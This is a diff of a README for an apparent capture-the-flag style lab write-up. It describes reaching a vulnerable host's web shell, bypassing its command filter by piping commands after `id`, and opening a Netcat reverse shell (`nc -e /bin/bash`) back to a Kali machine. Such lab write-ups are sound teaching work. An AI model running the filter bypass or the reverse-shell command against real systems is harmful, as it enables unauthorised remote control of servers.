cristinavisentin/hackingdemo/README.md

 Examining its contents, four entries stand out as disallowed `/login.php`, `/passwords.html`, `/lat_memo.html` and `/dev_shell.php`.
 These names are interesting names, but further investigation reveals that only the page `http://hackthebob/dev_shell.php` is worthy: it appears to be a web shell, suggesting a potential entry point for a possible exploration.

 ### Initial Access
-The first action is to test some basic bash commands to examine how the server reacts.
+The first action taken is testing some basic bash commands to examine how the server reacts.
 It appears that there's some internal block or filter in place, because commands such as `ls` or `pwd` display an error message, while the `id` command provides a coherent output.

 By attempting the command `id | ls` it became possible to list files.
-This strategy of nested commands can bypass the filter exploiting the fact that `ls` takes in input `id` output so that is possible to circumvent the filter.
+This strategy of nested commands can bypass the filter exploiting the fact that `ls` takes in input `id`'s output so that is possible to circumvent the filter.
+The following picture shows the web interface of `dev_shell-php` file and the output of the `ls` command.

 ![3](images/dev.png)

-Now downloading with `curl` command `dev_shell.txt.bak` file, that is probably the backup file of `dev_shell.php`, it is possible to see the reason why the other commands didn't work.
+The download of `dev_shell.txt.bak` file, which is likely a backup of `dev_shell.php`, using `curl` command reveals why some commands didn't work.
+There is a filter probably set for mitigation.

 ![4](images/blocked.png)

 ### Execution
-It is time now to establish a connection through the web shell and the Kali machine.
+Since the circumvention has been found is time now to expoit it for establishing a connection through the web shell and the Kali machine.
 This is done using Netcat which is a command line tool for remote communication over TCP connections

 - on Kali side the command `nc -lvp 6000` is ran, so the Kali machine is now listening on port 6000 for connection requests: this is the server side of the future TCP connection
 - on the web interface of the target, command `id | nc -e /bin/bash 10.0.2.6 6000` is ran: this will be the client side of the TCP connection.